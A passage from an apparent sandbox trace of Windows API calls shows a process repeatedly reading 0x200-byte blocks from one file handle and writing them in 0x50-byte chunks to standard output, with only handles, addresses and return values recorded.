[0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.891] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, 
lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.892] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.892] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] GetFileType (hFile=0x50) returned 0x1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.892] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] GetFileType (hFile=0x50) returned 0x1 [0216.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.893] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.893] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.894] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.894] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, 
lpOverlapped=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] GetFileType (hFile=0x50) returned 0x1 [0216.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.894] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 
| out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] GetFileType (hFile=0x50) returned 0x1 [0216.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.895] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.895] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.895] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] GetFileType (hFile=0x50) returned 0x1 [0216.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.896] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 
[0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.897] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.897] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] GetFileType (hFile=0x50) returned 0x1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.897] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 
[0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] GetFileType (hFile=0x50) returned 0x1 [0216.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.898] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.898] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.898] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.898] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, 
lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] GetFileType (hFile=0x50) returned 0x1 [0216.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.899] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] GetFileType (hFile=0x50) returned 0x1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] GetFileType (hFile=0x50) returned 0x1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] GetFileType (hFile=0x50) returned 0x1 [0216.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.943] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.943] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.943] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.944] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType 
(hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2ceee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2ceee4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] GetFileType (hFile=0x50) returned 0x1 [0216.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.944] WriteFile (in: hFile=0x50, lpBuffer=0x2cef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef34*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cef84*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cefd4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cefd4*, lpNumberOfBytesWritten=0x2cdfd8*=0x20, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.945] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cdfc4 | out: lpNewFilePointer=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0216.945] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cedf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] GetFileType (hFile=0x50) returned 0x1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.945] WriteFile (in: hFile=0x50, lpBuffer=0x2cee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee44*, lpNumberOfBytesWritten=0x2cdfd8*=0x50, lpOverlapped=0x0) returned 1 [0216.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] GetFileType (hFile=0x50) returned 0x1 [0216.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0216.946] WriteFile (in: hFile=0x50, lpBuffer=0x2cee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cdfd8, lpOverlapped=0x0 | out: lpBuffer=0x2cee94*, 
